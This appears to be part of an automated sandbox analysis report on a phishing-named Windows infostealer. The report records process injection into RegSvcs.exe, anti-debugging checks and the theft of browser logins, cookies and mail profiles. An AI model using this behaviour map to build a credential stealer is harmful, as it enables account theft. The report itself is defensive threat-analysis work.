Source: wscript.exe, 00000005.00000002.1556781131.000002937BD04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696501413j
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696501413s
Source: RegSvcs.exe, 00000009.00000002.2599518844.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696501413f
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696501413s
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: RegSvcs.exe, 00000003.00000002.2605360123.0000000000C87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltion
Source: wscript.exe, 00000005.00000002.1556781131.000002937BD04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{>
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696501413o
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696501413f
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8EAA2 BlockInput
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F34CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_016001F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_01600258 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_015FEBC8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D84CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_0140D270 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_0140D210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_0140BBE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 8_2_0134B528 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 8_2_01349E98 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 8_2_0134B4C8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F309D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D809D5 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6DE008
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AFB008
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00F71201
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00F52BA5
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F7B226 SendInput,keybd_event,1_2_00F7B226
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,1_2_00F922DA
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_2_00F70B62
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00F71663
Source: QUOTATION REQUIRED_Enatel s.r.l..exe, ageless.exe.1.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: QUOTATION REQUIRED_Enatel s.r.l..exe, ageless.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F30698 cpuid 1_2_00F30698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F88195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,1_2_00F88195
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F6D27A GetUserNameW,1_2_00F6D27A
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F4B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_00F4B952
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00F142DE
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7432, type: MEMORYSTR
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: ageless.exe | Binary or memory string: WIN_81
Source: ageless.exe | Binary or memory string: WIN_XP
Source: ageless.exe.1.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ageless.exe | Binary or memory string: WIN_XPe
Source: ageless.exe | Binary or memory string: WIN_VISTA
